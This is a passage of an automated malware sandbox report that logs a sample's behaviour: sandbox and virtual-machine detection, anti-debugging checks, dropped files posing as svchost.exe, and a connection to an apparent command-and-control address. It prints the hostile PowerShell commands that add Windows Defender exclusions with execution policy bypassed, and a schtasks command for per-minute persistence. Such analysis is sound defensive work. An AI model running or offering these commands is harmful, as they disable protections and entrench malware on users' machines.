                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Check if machine is in data center or colocation facility
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: All function.exe, 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: file.exe, 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.drBinary or memory string: SBIEDLL.DLLEF2TM6EI7BFXPX3GLXOMH4VTAFPF20UKO0S73JUDVEV21Q32MTBELASD866LCU32CDJRMIP4DNZ0LZIJKVPVQNIBFKIYYEEP71OXOXELM4CSZ9WVZ3RA4CY8B4ME4J9B5CQAQMV9URHZ2Z3MAGWCEW1RYEDD1H7NYCW4BJZSAKWQPX2HQWDYG5OBASDJF2SY1KSVU3YBIJA3ECZEKCEFQ6ZCWIRFABI3IONFL6UXQDRQCJ1UAS1DP0TC2MJ1JNJE2ELMCPVARDWIHP8IKOFNBZ2TR6I9W6FWDSOGT0MAHXXMJ48DOCEFDHMCSSZZV5H397082KZCSPSXDN5NOEMU08DND9LLCL4NCKLS4
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 3590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 1B880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeMemory allocated: 1ED0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeMemory allocated: 1B8C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1AD20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1A4A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: BD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1290000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 7F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1A7A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 2830Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 6999Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5012Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4754Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7766Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1758Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7172
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2555
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5908
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3866
                  Source: C:\Users\user\Desktop\file.exe TID: 6956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exe TID: 1824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4644Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4688Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112Thread sleep count: 7172 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep count: 2555 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep count: 5908 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep count: 3866 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2564Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3476Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3608Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: svchost.exe.0.drBinary or memory string: vmware
                  Source: svchost.exe, 00000003.00000002.2795781250.000000001BE00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrip
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CC7A81 CheckRemoteDebuggerPresent,3_2_00007FF7C0CC7A81
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.26.134 7000Jump to behavior
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\ALL slumzick.exe "C:\Users\user\AppData\Roaming\ALL slumzick.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeQueries volume information: C:\Users\user\AppData\Roaming\All function.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
